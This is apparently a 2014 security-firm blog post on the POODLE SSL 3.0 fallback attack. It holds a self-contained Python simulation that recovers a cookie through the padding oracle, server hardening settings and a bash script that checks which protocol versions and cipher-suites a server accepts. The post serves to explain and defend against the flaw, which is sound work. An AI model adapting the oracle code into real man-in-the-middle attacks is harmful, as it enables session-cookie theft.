15/10/2014

POODLE SSL 3.0 Fallback (CVE-2014-3566)

SSL Version 3 has been superseded by TLS 1.0, TLS 1.1 and TLS 1.2, but a lot of clients and servers are still around that support it. Worse, even clients and servers that both support the most recent protocol version can be tricked into using SSL Version 3: browsers retry a failed handshake with an older protocol version, so an active attacker who simply drops the TLS handshakes forces the connection down to SSL Version 3 [1]. The TLS_FALLBACK_SCSV signalling cipher-suite proposed in [1] lets a client mark such a retry as a fallback, so that a server which supports a higher version can abort it.

Using SSL Version 3 costs you confidentiality whenever the negotiated cipher-suite runs the symmetric block cipher in CBC (cipher block chaining) mode. Why? SSL Version 3 appends the MAC to the plaintext and then pads the result up to a multiple of the block size before encrypting, but the padding is not covered by the MAC and, apart from the final byte (the padding length), its content is never checked. A man-in-the-middle who can replace the last ciphertext block of a record and observe whether the server accepts the record or answers with an alert therefore has a padding oracle: each accepted record reveals one plaintext byte, and if the victim's browser can be made to resend the same request (for example via JavaScript), about 256 requests are needed per byte [1]. That is enough to recover an HTTP session cookie.
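To make that oracle concrete, here is a self-contained simulation of the attack. This is an added example, not code from the original article or from the Limes Security script, and it runs on the Python standard library only. It uses a toy Feistel block cipher and HMAC-SHA1 as stand-ins for the real AES and the SSL 3.0 MAC (the attack never touches the block cipher, only the CBC chaining and the padding check, so the substitution does not change anything). The record layout is modelled on SSL 3.0: MAC, then padding whose filler bytes are never checked, then CBC encryption with a fresh chaining value per record. The Victim class (an assumption of this example) stands in for browser and server sharing one session; its accepts() method is the oracle the man-in-the-middle observes, and the strict_padding switch shows why the same trick fails against the TLS 1.0 padding rule.

```python
"""POODLE against a simulated SSL 3.0 CBC record layer (constructed demo, stdlib only)."""
import hashlib
import hmac
import os

BLOCK = 16    # block size, as for AES-CBC under SSL 3.0
MAC_LEN = 20  # SHA-1 MAC length

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 4-round Feistel cipher on SHA-256. It stands in for AES: POODLE only
# exploits the CBC chaining and the padding check, never the block cipher.
def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def cbc_encrypt(key, iv, data):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, data):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        out += _xor(block_decrypt(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return out

def ssl3_seal(enc_key, mac_key, plaintext):
    """MAC-then-pad-then-encrypt as in SSL 3.0; returns (iv, ciphertext). The last byte is
    the padding length; SSL 3.0 lets the sender put anything into the filler bytes (TLS-style
    filler is used here so that a strict receiver accepts the genuine record as well)."""
    body = plaintext + hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += bytes([pad_len]) * (pad_len + 1)
    iv = os.urandom(BLOCK)  # fresh chaining value for every record
    return iv, cbc_encrypt(enc_key, iv, body)

def ssl3_open(enc_key, mac_key, iv, ct, strict_padding=False):
    """Returns the plaintext or None (bad_record_mac). strict_padding=False is the SSL 3.0
    rule: only the length byte is examined. strict_padding=True is the TLS 1.0 rule: every
    filler byte must equal the length byte."""
    if not ct or len(ct) % BLOCK:
        return None
    dec = cbc_decrypt(enc_key, iv, ct)
    pad_len = dec[-1]
    if pad_len >= BLOCK:
        return None
    if strict_padding and any(b != pad_len for b in dec[-1 - pad_len:-1]):
        return None
    body = dec[:len(dec) - 1 - pad_len]
    if len(body) < MAC_LEN:
        return None
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    if not hmac.compare_digest(mac, hmac.new(mac_key, data, hashlib.sha1).digest()):
        return None
    return data

class Victim:
    """Browser and server sharing one SSL 3.0 session (assumed model). Attacker-controlled
    JavaScript makes the browser send requests with chosen prefix/suffix lengths; the browser
    appends the secret (a cookie) itself. accepts() is all the man-in-the-middle can observe."""
    def __init__(self, secret):
        self.enc_key, self.mac_key, self.secret = os.urandom(16), os.urandom(16), secret

    def send(self, prefix_len, suffix_len):
        return ssl3_seal(self.enc_key, self.mac_key,
                         b"A" * prefix_len + self.secret + b"B" * suffix_len)

    def accepts(self, iv, ct, strict_padding=False):
        return ssl3_open(self.enc_key, self.mac_key, iv, ct, strict_padding) is not None

def poodle_recover_byte(victim, secret_len, j, max_attempts=50000, strict_padding=False):
    """Recover secret[j] as (byte, attempts); (None, attempts) if the oracle never fires."""
    prefix_len = (BLOCK - 1 - j) % BLOCK                       # secret[j] ends block t
    suffix_len = -(prefix_len + secret_len + MAC_LEN) % BLOCK  # last block is pure padding
    t = (prefix_len + j) // BLOCK + 1                          # index in [iv] + ct blocks
    for attempt in range(1, max_attempts + 1):
        iv, ct = victim.send(prefix_len, suffix_len)           # same plaintext, new chaining
        cb = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
        tampered = ct[:-BLOCK] + cb[t]                         # replace C_n with C_t
        if victim.accepts(iv, tampered, strict_padding):
            # accepted <=> D(C_t)[-1] ^ C_{n-1}[-1] == BLOCK-1, and P_t[-1] = D(C_t)[-1] ^ C_{t-1}[-1]
            return (BLOCK - 1) ^ cb[-2][-1] ^ cb[t - 1][-1], attempt
    return None, max_attempts

def poodle_recover(victim, secret_len, strict_padding=False):
    """Recover the whole secret; returns (bytes or None, total oracle queries)."""
    out, total = bytearray(), 0
    for j in range(secret_len):
        b, n = poodle_recover_byte(victim, secret_len, j, strict_padding=strict_padding)
        total += n
        if b is None:
            return None, total
        out.append(b)
    return bytes(out), total

if __name__ == "__main__":
    v = Victim(b"SID=s3cr3t")
    secret, queries = poodle_recover(v, 10)
    print(secret, "recovered after", queries, "oracle queries (about 256 per byte)")
```

Two details carry the whole attack: the attacker chooses prefix and suffix lengths so that the byte of interest is the last byte of some block and the record ends in a block consisting only of padding, and every retry gets a new chaining value, so the replaced block decrypts to a fresh random value until its last byte happens to equal the expected padding length. With strict_padding=True the oracle only fires when all sixteen bytes match, which never happens in practice; that is the difference between SSL 3.0 and TLS 1.0 padding handling.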

You have probably already seen our article on mobile apps and how they validate X.509 certificates. We have also analysed the POODLE vulnerability in the context of the banking servers behind those apps, and almost all of them still allow SSL Version 3 connections! In our opinion this is unnecessary: mobile banking apps do not run on legacy platforms, and both Android and iOS support TLS. The consequence is to turn off SSL Version 3 on the servers (in Apache's mod_ssl with "SSLProtocol all -SSLv2 -SSLv3", in nginx with "ssl_protocols TLSv1 TLSv1.1 TLSv1.2;").

The following script checks whether a given server accepts SSL Version 3 with a cipher-suite in CBC mode (and, with other arguments, which cipher-suites and protocol versions it accepts at all). It needs an OpenSSL build that still has SSLv3 compiled in: OpenSSL 1.1.0 and later disable SSLv3 by default and have removed SSLv2 entirely, so on such a system the -ssl2 and -ssl3 tests report an unknown option instead of a result.

#!/bin/bash
# Limes Security

# change to fit your needs
CERTPATH="/etc/ssl/certs"
SED="/bin/sed"
OPENSSL="/usr/bin/openssl"
CUT="/usr/bin/cut"
SLEEP="/bin/sleep"
GREP="/bin/grep"

# analyses the output of openssl s_client: "YES" if the handshake completed with
# the requested cipher, "NO <reason>" if openssl reported an error, otherwise the
# raw output so that it can be inspected by hand
print_result() {
    result=$1
    cipher=$2

    if [[ "$result" =~ "$cipher" ]];
    then
        echo "YES"
    else
        if [[ "$result" =~ ":error:" ]];
        then
            error=`echo -n $result | $CUT -d':' -f6`
            echo "NO $error"
        else
            echo "UNKNOWN RESPONSE"
            echo "$result"
        fi
    fi
}

# tests if the target accepts an SSLv3 connection with a cipher-suite in CBC mode.
# Under SSLv3 every cipher-suite that is neither NULL nor RC4 uses a block cipher
# in CBC mode (DES, 3DES, AES, Camellia, SEED, IDEA, RC2), and the OpenSSL names
# of most of them do not contain "CBC", so RC4 is excluded from the list instead.
test_sslv3() {
    target=$1

    ciphers=`$OPENSSL ciphers -ssl3 'ALL:!aNULL:!eNULL:!RC4' | $SED -e 's/:/ /g'`
    vuln=0

    echo "Testing $target"
    for cipher in $ciphers
    do
        echo -n "Testing $cipher "
        result=`echo -n | $OPENSSL s_client -ssl3 -cipher $cipher -CApath $CERTPATH -connect $target 2>&1`
        found=$(print_result "$result" $cipher)
        echo $found
        if [[ "$found" == "YES" ]];
        then
            echo "Yes, Server accepts SSLv3 and Cipher in CBC-Mode!"
            vuln=1
            break
        fi
    done
    if [[ $vuln -eq 0 ]];
    then
        echo "Server does not accept SSLv3 and a Cipher in CBC-Mode!"
    fi
}

# tests if a given cipher-suite is accepted with the given ssl/tls protocol version on the target
test_cipher() {
    version=$1
    target=$2
    cipher=$3
    echo -n "Testing $cipher "
    result=`echo -n | $OPENSSL s_client -$version -cipher "$cipher" -CApath $CERTPATH -connect $target 2>&1`
    print_result "$result" "$cipher"
}

# tests all cipher-suites on the target with the selected ssl/tls protocol version
test_ciphersuite() {
    version=$1
    target=$2

    # list all cipher-suites the local openssl offers for this protocol version,
    # except those without authentication (aNULL) or without encryption (eNULL)
    ciphers=`$OPENSSL ciphers -$version 'ALL:!aNULL:!eNULL' | $SED -e 's/:/ /g'`

    echo "Testing $target"
    for cipher in $ciphers
    do
        # test the cipher
        test_cipher "$version" "$target" "$cipher"
        # sleep a little so the target is not flooded with handshakes
        $SLEEP 0.20
    done
}

if [[ $# -lt 1 || $# -gt 3 ]];
then
    echo "Usage: ./ssl_cipher_suite.sh <target:port>"
    echo "    ./ssl_cipher_suite.sh google.at:443"
    echo "    this will test all cipher suites with all protocol versions"
    echo ""

    echo "Usage: ./ssl_cipher_suite.sh <target:port> <ssl version (ssl2,ssl3,tls1)> <cipher>"
    echo "    ./ssl_cipher_suite.sh google.at:443 ssl3 ECDHE-RSA-RC4-SHA"
    echo "    this will test a certain cipher suite with a certain protocol version"
    echo ""

    echo "Usage: ./ssl_cipher_suite.sh <target:port> SSLv3"
    echo "    ./ssl_cipher_suite.sh google.at:443 SSLv3"
    echo "    tests if the target accepts SSLv3 with a cipher suite in CBC mode (POODLE)"

elif [[ $# -eq 1 ]];
then
    test_ciphersuite "tls1" "$1"
    test_ciphersuite "ssl2" "$1"
    test_ciphersuite "ssl3" "$1"
elif [[ $# -eq 2 ]];
then
    test_sslv3 "$1"
elif [[ $# -eq 3 ]];
then
    test_cipher "$2" "$1" "$3"
fi


[1] B. Möller, T. Duong, K. Kotowicz: This POODLE Bites: Exploiting The SSL 3.0 Fallback, Google Security Advisory, September 2014.